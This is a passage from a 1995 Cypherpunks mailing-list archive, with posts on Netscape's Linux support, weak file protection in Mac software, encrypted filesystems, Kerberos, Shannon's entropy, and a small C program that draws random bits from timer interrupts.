with a $20 operating system are >throwing money at you while all the folks with $10K operating systems >aren't talking to you at all. > >While you may WANT to have all your sales be for OSF/1 machines or >solaris, but refusing to support Linux and ignoring the demand for >your products by the Linux community just because you don't think it >would sound as impressive, is actually quite childish and doesn't make >any financial sense. Foo. Supporting applications in a professional way on Linux is _tough_; everybody's got their own self-hacked copy that may have started out as SlackOS 4.1.3 but has the TooManyNotes Sound Widget replacement and has the XBrokenX video driver instead of the original one that didn't work on the TiltedSquareSneakyVideoCard and a way-cool new Obfuscated File System. It's like supporting things on "Unix" was back when everybody had source and a different flavor of M680x0 box. You can't just ask "Have you changed the AUTOEXEC.BAT since the machine came from the factory?" like Windoze app-vendors. Netscape may not have ever been _compiled_ with the compiler version the user has, much less tested on that kernel version, and the user may or may not know if their X Window System really is installed right or the TCP/IP connection works well and has working DNS support. Sure, it's easy to charge money for shipping the stuff with a diskette and a manual, but not doing so until they're ready to provide high-quality support isn't childishness, it's ethics (well, and/or bad-reputation-avoidance.) Now, I haven't checked whether they've trained all their people who answer phone calls from the public to acknowledge that there is an unsupported Linux version for folks who don't mind dealing with unsupported software, or if they've even got it on their Web site; the current version is there for ftp. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From carolann at censored.org Sun Sep 24 00:04:03 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sun, 24 Sep 95 00:04:03 PDT Subject: Apology to Netscape. Message-ID: <199509240703.AAA20745@usr4.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- Jeff Weintstein corrected me with: > This is what our press release said: > > An updated version of Netscape Navigator 1.1 for Mac OS > and Unix and Netscape Navigator 1.2 for Windows 3.1 and > Windows 95 will be available for downloading by existing > customers on the Internet next week. My apologies for the misquote. It only then makes the trading facts worse. Love Always, Carol Anne ps On the asides kind of things, do you realize the Netscape stock base of 5,000,000 shares is not a big sharebase? Coca-Cola's is 1,300,000,000. And by standards, your stock is really unstable. If Coca-Cola moves 3 points there'll be a trading halt, for the buying/selling imbalance will be too much. Even if only for 1 min. The trading halt gets the good or bad news onto "The Street". -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGUCaYrpjEWs1wBlAQF9ZAP6AkMCsveSU/E8KFDi84urnAR2KlXT42rS l+9tHh33ZWbM6VmHUMkqelM11vc7zU1eWLhXlYHaoOqwGuTef9irQigbnr+HwYKL Px9480/Chm59RWCG6j4pp4d0xUQO9Pj0lbpIecn72eDYReRIgh5+MU0jOCNdUNLe RvP7XvYI570= =Nb9y -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From eyes at amazon.com Sun Sep 24 04:12:23 1995 From: eyes at amazon.com (eyes at amazon.com) Date: Sun, 24 Sep 1995 04:12:23 -0700 Subject: Amazon.com Books -- personal notification service Message-ID: <199509241112.EAA03484@ernie.amazon.com> Hi, as per your request, we at Amazon.com Books are notifying you of new books matching the following criteria: subjects include "Cryptography" The new books are listed at the end of this message. If you're interested in any of these books you can order them online at http://www.amazon.com/ Your most humble automated search agent, Eyes Amazon.com Books http://www.amazon.com/ P.S. Please don't forget that Amazon.com Books has over one million titles for you to choose from, many discounted 10 to 40 percent off the list price. If you have any online friends who might enjoy Amazon.com Books, we'd really appreciate you spreading the word! Thank you! ------------------------------------------------------------------------ "Advances in Cryptology--Eurocrypt-94 : Workshop on the Theory and Application of Cryptographic Techniques, Perugia, Italy, May 1994 : Proceedings)" by Alfredo De Santis List Price: currently unknown Subjects: Computer security, Cryptography Publisher: Binding: Hardcover Expected publication date: September 1995 ISBN: 3540601767 ------------------------------------------------------------------------ "Enigma : A Novel" by Robert Harris, David Rosenthal(Editor) List: $23.00 -- Amazon.com Price: $20.70 -- You Save: $2.30 (10%) Subjects: World War, 1939-1945, Secret service, Great Britain, Fiction, Cryptography Publisher: Random House Binding: Hardcover Expected publication date: October 1995 ISBN: 0679428879 ------------------------------------------------------------------------ "Pass It On! : All About Notes, from Secret Codes and Special Inks to Fancy Folds and Dead Man's Drops" by Sharon Bailly, Anne Canevari Green(Illustrator) List: $18.90 -- Amazon.com Price: $18.90 Subjects: Cryptography, Juvenile literature, Writing Publisher: Millbrook Pr Binding: Library Binding Expected publication date: September 1995 ISBN: 1562945882 ----- End of forwarded message from eyes at amazon.com ----- From dmandl at panix.com Sun Sep 24 08:12:53 1995 From: dmandl at panix.com (David Mandl) Date: Sun, 24 Sep 95 08:12:53 PDT Subject: macworld crypto articles Message-ID: At 3:49 PM 9/23/95, steven ryan wrote: >They searched for an applications programmer *UN*skilled at cryptography to >try and crack the password protection of the 8 best selling Mac programs. >Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours. Yup, pretty amazing. I only skimmed the article, but I believe that out of all the programs he tried, there was only one whose crypto he couldn't crack. I found it all a little hard to believe. I mean, even if they used the most obsolete algorithm, wouldn't you have to know _something_ about cryptanalysis to crack it? Are these vendors just putting a "this file is locked with this such and such a password" string at the front of the file, or what? Interesting historical note: In my old APL days (early 80's), IBM used to lock their VSAPL workspaces with just such a scheme--a "locked bit" at some fixed position in the file. But there were enough other reasons not to use that horrible product... --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From adam at homeport.org Sun Sep 24 09:34:17 1995 From: adam at homeport.org (Adam Shostack) Date: Sun, 24 Sep 95 09:34:17 PDT Subject: Amazon.com Books -- personal notification service (fwd) Message-ID: <199509241634.MAA18446@homeport.org> Amazon.com books (which someone mentioned here a few days ago) has a free personal notification service for new books of interest. They also claim not to sell your preferences if you so request. They have Springer-Verlag conference proceedings, and books by Hakim Bey. I spent a while telling them all about whose new books I'd like to hear about, and this came to me today. Adam ----- Forwarded message from eyes at amazon.com ----- From stevenw at iglou.com Sun Sep 24 10:19:57 1995 From: stevenw at iglou.com (Steven Weller) Date: Sun, 24 Sep 95 10:19:57 PDT Subject: Found on usenet: ACLU -- "Big Brother and the power of the Net" Message-ID: The Midpeninsula Chapter of American Civil Liberties Union of Northern California presents a free program, open to the public Speaker: Jim Warren, MicroTimes correspondent, originator of the West Coast Computer Faire, PBS Computer Chronicles and numerous other enterprises Topic: Big Brother and the power of the Net Time: Tuesday, October 17, 1995 at 8:00 pm Place: Mandarin Classic Restaurant; First & Main Streets, Los Altos There is no fee and no reservation is required for those coming just for the program, but this is the annual meeting of the Midpeninsula Chapter and is preceded by a reception and dinner that are open to the public, but for which a reservation is required (see below). 6:00 pm Reception and no-host bar 7:00 pm Dinner 8:00 pm Jim Warren speaks ------------------------------------------------------------------------- Dinner Reservation Please return by Friday, October 6, 1995 Dinner reservation for ____ person(s) Check for $ _____ ($25 per person) is enclosed. Please make check payable to ACLU Mid-peninsula. Mail to: Iris Barrie If you have questions, call: 4250 El Camino, D-138 Iris Barrie at 415-856-0193 Palo Alto, CA 94306 -- Les Earnest (les at cs.stanford.edu) Phone: 415 941-3984 Computer Science Dept.; Stanford, CA 94305 Fax: 415 941-3934 ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From chen at intuit.com Sun Sep 24 10:34:20 1995 From: chen at intuit.com (Mark Chen) Date: Sun, 24 Sep 95 10:34:20 PDT Subject: macworld crypto articles In-Reply-To: Message-ID: <9509241729.AA17667@doom.intuit.com> Dave, > At 3:49 PM 9/23/95, steven ryan wrote: > >They searched for an applications programmer *UN*skilled at cryptography to > >try and crack the password protection of the 8 best selling Mac programs. > >Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours. > > Yup, pretty amazing. I only skimmed the article, but I believe that out of > all the programs he tried, there was only one whose crypto he couldn't > crack. I found it all a little hard to believe. I mean, even if they used > the most obsolete algorithm, wouldn't you have to know _something_ about > cryptanalysis to crack it? Are these vendors just putting a "this file is > locked with this such and such a password" string at the front of the file, > or what? I hate to say it, but in the case of Quicken, this is exactly right. In version 5.0, we've taken measures to protect the online financial stuff, but there's no serious protection at all on the local data file. It's truly a deplorable state of affairs. - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From lethin at ai.mit.edu Sun Sep 24 10:46:20 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Sun, 24 Sep 95 10:46:20 PDT Subject: macworld crypto articles In-Reply-To: <4444rl$nrh@life.ai.mit.edu> Message-ID: <199509241745.NAA20271@toast.ai.mit.edu> In article <4444rl$nrh at life.ai.mit.edu> Chen writes: > It's truly a deplorable state of affairs. For the next version, include PGP free with every version of Quicken, and have Quicken just "call" PGP. Of course, users can encrypt their files now with PGP. Is there an Intuit bboard where someone could post instructions? -- --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 From jsimmons at goblin.punk.net Sun Sep 24 10:50:36 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Sun, 24 Sep 95 10:50:36 PDT Subject: Netscape for Linux? In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com> Message-ID: <199509241746.KAA01423@goblin.punk.net> On September 23, Bill Stewart wrote: > > Foo. Supporting applications in a professional way on Linux is _tough_; > As a Linux user and advocate, I've gotta agree here. I'm glad that Netscape is going to continue to supply us with an unsupported binary, and I can't blame them a bit for not wanting to support an OS where every user has his own private version number ... would be nice if we could get 128 bit keys, though ... (hint, hint). As for your other comments about Linux - would you care to take off your coat and meet me in Comp.os.flamewars sometime? ;-) -- Jeff Simmons jsimmons at goblin.punk.net From adam at homeport.org Sun Sep 24 12:28:42 1995 From: adam at homeport.org (Adam Shostack) Date: Sun, 24 Sep 95 12:28:42 PDT Subject: macworld crypto articles In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu> Message-ID: <199509241924.PAA18525@homeport.org> | For the next version, include PGP free with every version of Quicken, | and have Quicken just "call" PGP. | | Of course, users can encrypt their files now with PGP. Is there an | Intuit bboard where someone could post instructions? Of course, it would be *much* easier to store Quicken + data files on an encrypted filesystem (Cryptdisk or SFS). To start quicken, the user starts Cryptdisk, runs Quicken on his encrypted files (now transparently available), and then quits. Cryptdisk disappears 5 minutes later. Thus, Intuit isn't putting crypto calls which might be illegal into their code. They maintain a single code base, a single version in the warehouses, and continue to lobby Congress to change the laws. (Quicken gets stored on the encrypted area so that it won't start up and say 'where are my data files?') Naturally, this works with programs other than Quicken. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From beckman at cs.hope.edu Sun Sep 24 12:46:03 1995 From: beckman at cs.hope.edu (Peter Beckman) Date: Sun, 24 Sep 95 12:46:03 PDT Subject: Kerberos Message-ID: <9509241945.AA07710@atlantis.cs.hope.edu> We are studying kerberos, the security system implemented by MIT's Athena network. Has anyone started, considered, imagined or completed any similar security systems, preferably using public key cryptography (as opposed to a single 56-bit DES key)? Please mail any responses to beckman at cs.hope.edu. -- Peter Beckman Hope College beckman at cs.hope.edu http://www.cs.hope.edu/~beckman/ From adwestro at ouray.cudenver.edu Sun Sep 24 13:09:19 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Sun, 24 Sep 95 13:09:19 PDT Subject: Entropy VI: "Shannon's Choice" (with apologies to Wm. Styron) Message-ID: I'm always glad to see stuff here about entropy: it's a topic that comes up in PGP 101 when locals ask, "How long should my passphrase be?" and, as we've seen recently, failure to generate adequate entropy for pseudo-random numbers is often the Achilles' Heel of otherwise solid cryptosystems. I found some info about Shannon's choice of the word "entropy" in an unexpected source lately. I had some free time this week due to the surprise snowstorm here, and used it to type in a few paragraphs. This is intended less for immediate discussion than for the list's archives, so that I can point folks to it in the future. And I'm not going to cite the source, to avoid copyright infringement nastygrams...if you know who the author is, keep it to yourself: you'll only suffer public ridicule and loss of "reputation capital" for Not Watching Enough TV!!! :-) N.B. -- some of this impresses me as pompous bullshit, and I'm not in agreement with it. But the story about von Neumann made it a worthwhile read, as least to me. ================================================================== I want now to turn to another juncture in the cascading bifurcations that mark interpretations of Maxwell's Demon. The juncture occurs when Leon Brillouin and Claude Shannon diverge in their opinions about what the relationship between information and entropy should be. In Brillouin's analysis of Maxwell's Demon, the Demon's information allowed him to sort molecules, thus decreasing the system's entropy; but this information had to be paid for by an even greater increase in entropy elsewhere in the system. For Brillouin, then, information and entropy are opposites and should have opposite signs. He emphasized the inverse connection between information and entropy by coining "negentropy" (from negative entropy) as a synonym for information. To Shannon, an engineer at Bell Laboratories who published a two-part paper that was to form the basis of modern information theory (1948), information and entropy were not opposites. They were identical. When Shannon devised a probability function that he identified with information, he chose to call the quantity calculated by the function the "entropy" of the message. Why he made this choice is unclear. Rumor has it that von Neumann told Shannon to use the word because "no one knows what entropy is, so in a debate you will always have the advantage." One could argue that von Neumann's comment was only one element and that the choice of "entropy" was overdetermined, with multiple factors leading to its conflation with "information." On a conceptual level, an important consideration was the similarity between Shannon's equation for infor- mation and Boltzmann's equation for entropy. Because the two equations had similar forms, it was tempting to regard the entities they defined as the same. On the level of language, entropy was compelling because it was a term of recognized legitimacy to the concept of information. On a cultural level, Shannon's choice anticipated the contemporary insight that proliferating information is associated with the production of entropy. [...] Whatever the reasons for Shannon's choice, it is regarded by many commentators within our scientific tradition as a scandal, for it led to the (metaphoric) knotting together of concepts that are partly similar and partly dissimilar. Typical is K. G. and J. S. Denbigh's reaction in their careful study of the way the quantity defined by Shannon's equation differs from thermodynamic entropy. Recounting the story about von Neumann's advice, they write that thus, "confusion entered in and von Neumann had done science a disservice!" Jeffrey S. Wicken is even more explicit, calling Shannon's choice "loose language" that served "the dark god of obfuscation." "As a result of its independent lines of development in thermodynamics and information theory, there are in science today two 'entropies,'" Wicken writes. "This is one too many. It is not science's habit to affix the same name to different concepts. Shared names suggest shared meanings, and the connotative field of the old tends inevitably to intrude on the denotative terrain of the new." Clearly Wicken's concern is to restore scientific univocality by closing off the ability of the information-entropy connection to act as a metaphor rather than a congruence. Yet at the same time he admits that shared language creates an inevitable "intrusion" into the "denotative terrain" of one term by the "connotative field" of another. The problem is more scandalous than he recognizes, for whenever a heuristic is proposed, it necessarily uses "shared names" that cause scientific denotation to be interpenetrated by cultural connotations. For what else is language but "shared names"? As Wittgenstein has observed, there are no private languages. Moreover, the distinction between denotative and connotative language is itself part of the distinction between language-as-vehicle and language-as-concept which metaphors, and particularly self-reflexive metaphors, bring into question. To turn Wicken's argument on its head, we might say he recognizes that metaphors in general, and the information-entropy connection in particular, directly threaten science's ability to separate ideas from the language it uses to express them. In his anxiety to suppress the metaphoric potential of Shannon's choice, Wicken misses the richly complex and suggestive connections that were instrumental in enabling a new view of chaos to emerge. By the simple device of using "information" and "entropy" as if they were interchan- geable terms, Shannon's choice gave rise to decades of interpretative commentary that sought to explain why information should be identified with disorder rather than order. For the alliance between entropy and information to be effective, information first had to be divorced from meaning (a premise made explicit in Shannon's 1948 papers) and had to be associated instead with novelty. Recall the random number generator, mentioned earlier, that produces a tape we can read. No matter how long we watch the tape, numbers keep appearing in unpredictable sequence. >From one point of view this situation represents chaos; from another, maximum information. Once randomness was understood as maximum information, it was possible to envision chaos (as Robert Shaw does) as the source of all that is new in the world. Wicken is correct in noting that denotative and connotative fields overlap; in the case of information, the connotation that "intruded" upon the denotative field of chaos was complexity. Whereas chaos had traditionally meant simply disorder, complexity implied a mingling of symmetry with asymmetry, predictable periodicity with unpredictable variation. As we have seen, chaotic or complex systems are disordered in the sense that they are unpredictable, but they are ordered in the sense that they possess recursive symmetries that almost, but not quite, replicate themselves over time. The metaphoric joining of entropy and information was instrumental in bringing about these developments, for it allowed complexity to be seen as rich in information rather than deficient in order. Sources cited: K. G. Denbigh and J. S. Denbigh, _Entropy in Relation to Incomplete Knowledge_ (Cambridge University Press, 1985) Jeffrey S. Wicken, "Entropy and Information: Suggestions for a Common Language." Philosophy of Science 54:176-193 (1987) ================================================================== Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 From aleph1 at dfw.net Sun Sep 24 11:10:14 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 24 Sep 1995 13:10:14 -0500 (CDT) Subject: Netscape for Linux? In-Reply-To: <199509241746.KAA01423@goblin.punk.net> Message-ID: I must agree that supporting something like that client that everyone wants to use in their on configuration is not an easy thing. But the are many ISP using linux as web servers. I for one would buy a few servers my self. Its a shame netscape does not make an agreement with someone like Red Hat (a commercial linux vendor) and supply a server for use with it. Iam sure if they can support a server for BSDI (therefor FreeBSD and NetBSD) they can support one for Red Hat (and there for Linux). But this does not belong in cypherpuns anymore. Nor are the people making this desitions in this list anyway. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From khijol!erc Sun Sep 24 13:28:33 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 13:28:33 PDT Subject: Netscape for Linux? In-Reply-To: <3064BDFB.717F@netscape.com> Message-ID: <199509242006.PAA02258@khijol> -----BEGIN PGP SIGNED MESSAGE----- > > And the sad part is that now that they have announced that they are > > dropping their unofficial Linux support, > > I have no current plans to alter our treatment of Linux. It is not now, > nor has it ever been, a supported platform. We do build for it, > and some people are happy about that. Does this mean that a Linux version of Netscape will no longer be available, or that it *will* be available but unsupported? > I have not constructed a business case which would cause Netscape > to begin support for Linux versions of the Navigator. Right now, I'm > not sure that making a point of this would do what you want. That all depends on what you mean by "support". If you mean "we will no longer make Netscape available for the Linux platform", that's not support. If you mean "we will no longer respond to bug reports for Netscape on this platform" then that's discontinuing support. Please be more specific in your postings? As a project manager and developer, I have constructed many a business case for the development and/or support for products - such a case could easily be made for Linux support for Netscape, irrespective of what you mean by "support". - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGW6JSS9AwzY9LDxAQElggP9Gy4h5OYkfQqtE0yi4K8rng1C3G/vgr0S EOfUdFaiw8pewcjgxe4ZqtDyxAeeRGgEYjmAQLA5739xjExCGL45O4OnYMopGDzd Sfmi557I/qJib1utfE51wkUjqyxutTceb4UDUmUS0TOs/kMCf6DXTvNePRLxVtm4 rW1C9BfDClk= =kj39 -----END PGP SIGNATURE----- From bianco at itribe.net Sun Sep 24 13:32:59 1995 From: bianco at itribe.net (David J. Bianco) Date: Sun, 24 Sep 95 13:32:59 PDT Subject: Kerberos In-Reply-To: <9509241945.AA07710@atlantis.cs.hope.edu> Message-ID: <199509242029.QAA26489@gatekeeper.itribe.net> On Sep 24, 15:45, Peter Beckman sent the following to the NSA's mail archives: > Subject: Kerberos || We are studying kerberos, the security system implemented by MIT's Athena network. || Has anyone started, considered, imagined or completed any similar security || systems, preferably using public key cryptography (as opposed to a single 56-bit || DES key)? || The Open Software Foundation's Distributed Computing Environment has the concept of a central security registry (which is currently based on Kerberos). I haven't delved too deeply into them, but the OSF website has some DCE RFCs about adding public key capabilities to the registry. They should be off the OSF home page somewhere at . David -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From lethin at ai.mit.edu Sun Sep 24 13:45:04 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Sun, 24 Sep 95 13:45:04 PDT Subject: Piggybacking Message-ID: <199509242044.QAA15210@grape-nuts.ai.mit.edu> In article <444bp8$sd4 at life.ai.mit.edu> Adam writes: > Naturally, this works with programs other than Quicken. By leveraging on the popularity of Quicken and people's insecurities about their financial data cypherpunks might be able to spread PGP and SecureDrive technology more rapidly. If I were a marketing manager at a startup selling SecureDrive, for example, I'd suggest trying to exploit the above by selling my product as "QuickxxSecure" which would install after Quicken, make the secure drive, move quicken there, etc. It would then sell in a box with a graphical design (e.g. white stripe on red box, to blend nicely with Intuit's red on white) that Egghead would want to put it on the shelf right next to Quicken. Cypherpunks with a crypto-anarchic agenda might "package" shareware in a way that would exploit the same principles. Surely, a bigger market than people using EMACS RMAIL. --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 From patrick at verity.com Sun Sep 24 13:45:20 1995 From: patrick at verity.com (Patrick Horgan) Date: Sun, 24 Sep 1995 13:45:20 -0700 Subject: Defense against a class of programming bugs Message-ID: <9509242045.AA20998@cantina.verity.com> From khijol!erc Sun Sep 24 13:45:22 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 13:45:22 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <199509232229.SAA00612@nrk.com> Message-ID: <199509242029.PAA02731@khijol> -----BEGIN PGP SIGNED MESSAGE----- > As a hardware type, I'd prefer a diode noise generator over a > radioactivity detector. I'd hate for the Fort to be tempted to fudge the > latter's output by flooding my house from a black helicopter... No, they'll just flood it with RF and force your diode to act as a detector - then they can feed you anything they like ;) I learned the hard way - keep the transmitters away from a reverse-biased doide acting as a noise generator. Only until I examined the output did I realize it wasn't random. I fixed it, though, by looking at the output and testing its randomness. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGW/mSS9AwzY9LDxAQGc4gQAjwszSdrT188RrvbTnp9ywwJ99ppixEef V9m59O169LIh4YwIejicJbO7/zC5t99gs15ZnbTWXZim8r+04XrR3AFyRnQFTDfJ WmYmW6gHWR40xBxgVMFUydz9TsZqCxGb+iVQRTeteodgMr6x+zbJ0qa8FWy4UNLr iYfFbjH+okg= =Qv+f -----END PGP SIGNATURE----- From donner at ny.ubs.com Sun Sep 24 14:11:52 1995 From: donner at ny.ubs.com (Marc Donner) Date: Sun, 24 Sep 95 14:11:52 PDT Subject: change of address notice for Marc Donner Message-ID: <9509242111.AA21917@ikura.ny.ubs.com> Dear colleague, friend, or correspondent, My new business address is: Marc Donner Union Bank of Switzerland 299 Park Avenue New York, NY 10171 212-821-6229 You can send me email at: donner at ubss.com The destination list for this mail is gleaned from an automated analysis of many megabytes of mail that I have accumulated over the last three years. In some cases you are receiving this not because we are acquaintances or correspondents but because you were a recipient of some piece of mail that I also received and kept. If so, I apologize for the intrusion. I have pruned the list extensively, but some email IDs are sufficiently opaque that I cannot reliably identify the person at the other end. Marc From perry at piermont.com Sun Sep 24 14:21:26 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Sep 95 14:21:26 PDT Subject: "Going after Netscape" In-Reply-To: <199509232003.QAA11668@book.hks.net> Message-ID: <199509242121.RAA08234@frankenstein.piermont.com> Lucky Green writes: > >> So, keep on "attacking" Netscape (kudos to Ray, by the way, > >> though I've seen Netscape bomb on certain sites, as with the > >> Cypherpunks archive site, as several of us noted a few months > >> ago...probably a different problem, but indicative that Netscape > >> can be corrupted). But let's be careful not to convey any flavor > >> of this being a vendetta. > > > >I agree. The goal is not to kill Netscape but to make the net > >secure. > > Absolutely. We aren't on a vendetta. We want to make the net secure for > privacy. Agreed. My main purpose in harrassing Netscape is that I have to live with customers who insist on using it and I want them to be safe. If that means having to attack it enough that the the press starts noticing and management starts paying attention as a result, so be it. Perry From frenchie at magus.dgsys.com Sun Sep 24 15:09:16 1995 From: frenchie at magus.dgsys.com (SysAdmin) Date: Sun, 24 Sep 95 15:09:16 PDT Subject: Netscape for Linux? In-Reply-To: <199509240243.WAA00266@hoopsnake.cjs.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- While browsing my mail I noticed that Christopher J. Shaulis wrote: [snipped] > You have also turned numerous other attempts by varionus people to buy > both quantities of navigaors and server software for Linux. > > It seems to me that you folks are going out of your way to deny the > fact that the Linux market exists. I think that its because you are > embarassed that all these people with a $20 operating system are > throwing money at you while all the folks with $10K operating systems > aren't talking to you at all. > > While you may WANT to have all your sales be for OSF/1 machines or > solaris, but refusing to support Linux and ignoring the demand for > your products by the Linux community just because you don't think it > would sound as impressive, is actually quite childish and doesn't make > any financial sense. > > Christopher You tell'em Christopher! I have turned on quite a few of my friends to Linux. Some are Engineers and Programmers in businesses that would love to add Netscape navigator and server. Hell, I would too. Screw 'em. If they want to be the defacto standard for *some* OS's but not all, someone else will come along and fill in the gap. Besides, they already made the point that they don't want to make money so why change the status quo. All the more reason to show the weaknesses of the product before others get sucked in. I'll stick to TkWWW and Lynx thank you. - -- =====================PGP Encrypted Mail Preferred======================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r y++ [Geek Code v3.0] a.k.a [ root at magus.dgsys.com / vamagus at delphi.com] ========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAgUBMGXXKLbmxeO+s+1xAQF7BwP9GrZe0+DULZegVjPJB7iiLagq8dnY3QLs J26v2pARiZyyLBZgpBgzenXv8I0nwAL4UnDREWnOOunC3RdM0o5+ROM34tSnhdfM 4T4xEUXHp2CSI98VAkhSqKgnWZEACSeDAcx2gT7jGneAhRPO/VCQkZfz3SquRiHO 4RumiNsnInA= =TuK+ -----END PGP SIGNATURE----- From jcaldwel at iquest.net Sun Sep 24 15:45:41 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Sun, 24 Sep 95 15:45:41 PDT Subject: Lynx (or approx for Windows)? Message-ID: On 24 Sep 95 at 18:10, SysAdmin wrote: > Screw 'em. If they want to be the defacto standard for *some* OS's > but not all, someone else will come along and fill in the gap. > Besides, they already made the point that they don't want to make > money so why change the status quo. All the more reason to show the > weaknesses of the product before others get sucked in. I'll stick to > TkWWW and Lynx thank you. Sounds odd, but would there be something like Lynx available for Windows, preferably with forms features fixed. I don't browse for the pretty pictures and turning the graphics off in Nutscrape doesn't speed it up much. From rfb at lehman.com Sun Sep 24 15:53:56 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Sun, 24 Sep 95 15:53:56 PDT Subject: `Random' seed. In-Reply-To: <9509200915.ZM14792@glacius.alias.com> Message-ID: <9509242252.AA03400@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: Richard Martin Date: Wed, 20 Sep 1995 09:15:49 -0400 Vaporware which I heard around CFP '95, and have been sort of wondering about ever since... Some one told me that some one else [possibly Matt Blaze] had been looking at how much randomness could be got by forking two child processes which would just run as asynchronous clocks: whenever the parent program needs a little `random' bit, it queries both and gives (clock(A) + clock(B) % 2) or something. I've played around with something that Matt posted here a while back which seems to use the same idea. Matt suggested that this appears to emit one random bit per second. I've done some very lightweight analysis and haven't seen anything to suggest that the output is not random, but I wouldn't make any bets based on what I've done. FWIW, I discussed this code briefly with an engineer at Netscape a while back . . . . Rick - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /* -*- Mode: C -*- */ /********************************************************************* This is from a message on the Cypherpunks mailing list: Posted-Date: Fri, 20 Jan 95 03:36:17 -0500 Message-Id: <9501200836.AA19977 at merckx.info.att.com> To: cypherpunks at toad.com Subject: Re: Threats in real life - what are we worried about? Date: Fri, 20 Jan 95 03:36:17 -0500 From: Matt Blaze *********************************************************************/ #include #include int count=0; void printbit() { signal(SIGALRM,printbit); alarm(1); printf("%1d",count&01); fflush(stdout); } main() { signal(SIGALRM,printbit); alarm(1); while (1) count++; } -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGXhPZNR+/jb2ZlNAQEkdgQAlVBgpN8LLeb9TM0dhy1Bx7KXfHCiIqV6 UoLRm/hoEzsiOnGbJeNlx2n1dyxdmti/Zvacnsi2CAKHhJGAaARcQGy+hWc6uS3v nbOqOoFkvRlWYyYV6QLgvKckYM+tbYBvrjQgQ/XivpoPQPbzyRI6cW4soLuJ7fpu xug5C8yYc8A= =dT9a -----END PGP SIGNATURE----- From rrothenb at ic.sunysb.edu Sun Sep 24 16:28:14 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sun, 24 Sep 95 16:28:14 PDT Subject: Snake Oil (was: macworld crypto article) In-Reply-To: Message-ID: <199509242327.TAA06477@libws4.ic.sunysb.edu> Dave Mandl wrote about some lame Mac crypto thing... [..] > Yup, pretty amazing. I only skimmed the article, but I believe that out of > all the programs he tried, there was only one whose crypto he couldn't > crack. I found it all a little hard to believe. I mean, even if they used > the most obsolete algorithm, wouldn't you have to know _something_ about > cryptanalysis to crack it? Are these vendors just putting a "this file is > locked with this such and such a password" string at the front of the file, > or what? [..] Sounds like it's time for a Snake-Oil 